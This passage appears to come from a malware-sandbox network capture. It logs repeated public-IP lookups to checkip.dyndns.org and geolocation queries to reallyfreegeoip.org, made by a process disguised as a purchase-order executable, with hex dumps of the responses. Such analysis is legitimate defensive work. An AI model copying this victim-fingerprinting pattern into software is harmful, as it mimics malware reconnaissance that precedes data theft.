Oct 1, 2024 07:21:02.921678066 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:02 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7c4be9a81f25cda6ab809ffbedd2af65 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49716	132.226.247.73	80	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 07:21:03.545608044 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 07:21:05.218928099 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:04 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 49b4cc74bad9dbc0a6047eb98760cddf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 1, 2024 07:21:05.219253063 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:04 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 49b4cc74bad9dbc0a6047eb98760cddf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 1, 2024 07:21:05.219564915 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:04 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 49b4cc74bad9dbc0a6047eb98760cddf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 1, 2024 07:21:05.219705105 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:04 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 49b4cc74bad9dbc0a6047eb98760cddf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49718	132.226.247.73	80	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 07:21:05.814796925 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 07:21:06.500246048 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:06 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0bb3a96f9101507e2a3d88acce7c903e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49720	132.226.247.73	80	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 07:21:07.191354990 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 07:21:07.883394003 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:07 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ad809d11818a9f1f3fc38d50e1f2bc34 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49722	132.226.247.73	80	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 07:21:08.485105991 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 07:21:09.178500891 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:09 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b20b1bc02e9a9d1711eaf0244f835543 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49724	132.226.247.73	80	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 07:21:09.769123077 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 07:21:10.432738066 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d09511d9f2c0f973567275f18b69f2f3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49726	132.226.247.73	80	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 07:21:11.058722973 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 07:21:11.731317043 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d87ad9a9caa64d27453aa6694b112526 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49710	188.114.96.3	443	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 05:21:01 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 05:21:01 UTC	680	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:01 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 76092 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dAV9QS%2BM2slJzjMsc0Y1%2FmGtoRLY8cVKvQCFaejPQ%2BIjNJjgYxX8rvq5eNkKpUDBHSorvmGXkccLrbLyqWSn%2Fy3T0GrSUJbMW8xIVrLDY2%2BhPoUXaaiOt8vmywPn6RloCe6PS78A"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cba01bf2d444297-EWR
2024-10-01 05:21:01 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 05:21:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49711	188.114.96.3	443	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 05:21:02 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-01 05:21:02 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:02 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 76093 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aEL44%2BO7yJxB6ueivUSoZZTBE%2FAEtoJyLKncc0Pn5gHPcR2aK7GX5MToIfLpuOh1mc%2B5xKGHYsaVY5r4qojNWV0QVqI9A%2Ffr1zD7dcbE6qJgfxSfJ7nUi5jKLzoUakuMyBcISmbX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cba01c47a627d24-EWR
2024-10-01 05:21:02 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 05:21:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49714	188.114.96.3	443	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 05:21:03 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 05:21:03 UTC	680	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:03 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 76094 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6gad3aTVe6sZwwIvIgJ3qyN7tznT57z3bYEUDZhSWJk5NdoyGuChrUcvTSPGab1FyU8yfwL0SthZ1STrpzq8Tt9EQy2WMwu6UzukWWqS%2FDgS%2BxDoWUmWacfqm%2Fq%2Bpyyn9Hw%2Fglhw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cba01ccce8e0fa9-EWR
2024-10-01 05:21:03 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 05:21:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49717	188.114.96.3	443	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 05:21:05 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 05:21:05 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:05 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 76096 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ye%2BVWzykUfGTdtFBcVylmjNwY9J7aTHZAM%2BGo1JRHDoVDJL8DVcKaczY4obgJRdo8%2Fh8BvfLC5h9jBvVRKr5dMzpna9gDaMMmttrOzqN%2FFtA8nmEzp6og74KVE2aCAqzu7hR2oGL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cba01dafc408c21-EWR
2024-10-01 05:21:05 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 05:21:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49719	188.114.96.3	443	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 05:21:07 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 05:21:07 UTC	682	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:07 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 76098 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GbRoAMnVtchy6N4tpWuR8MZzM4gSiRCoSk5PEWqQzk%2F9KkBItWdcpEIzLFNxoHBd8Hl6%2F%2FefC2bqkn3myKTAfysoU%2FkzszbxxAMNowpx8gSt29dS%2FcuZzGgyjM8zy2jrzD%2BowVE2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cba01e369e08c0b-EWR
2024-10-01 05:21:07 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 05:21:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49721	188.114.96.3	443	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 05:21:08 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 05:21:08 UTC	676	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 05:21:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 76099 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DPNhJfnb5o5HsTyhImp8OUjKJtRpsEjwdXoR7gheSk1Nt7iJkytl1BaU4WEtb6KJzTIY1G7t1WiwZOSWxVpONOIWQqzIpD7%2BI9o10SiEDRtdYe%2BlT5Nmttoh%2BzyZKSutNihJZ5Ow"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cba01ebaae97d24-EWR
2024-10-01 05:21:08 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 05:21:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49723	188.114.96.3	443	7704	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 05:21:09 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
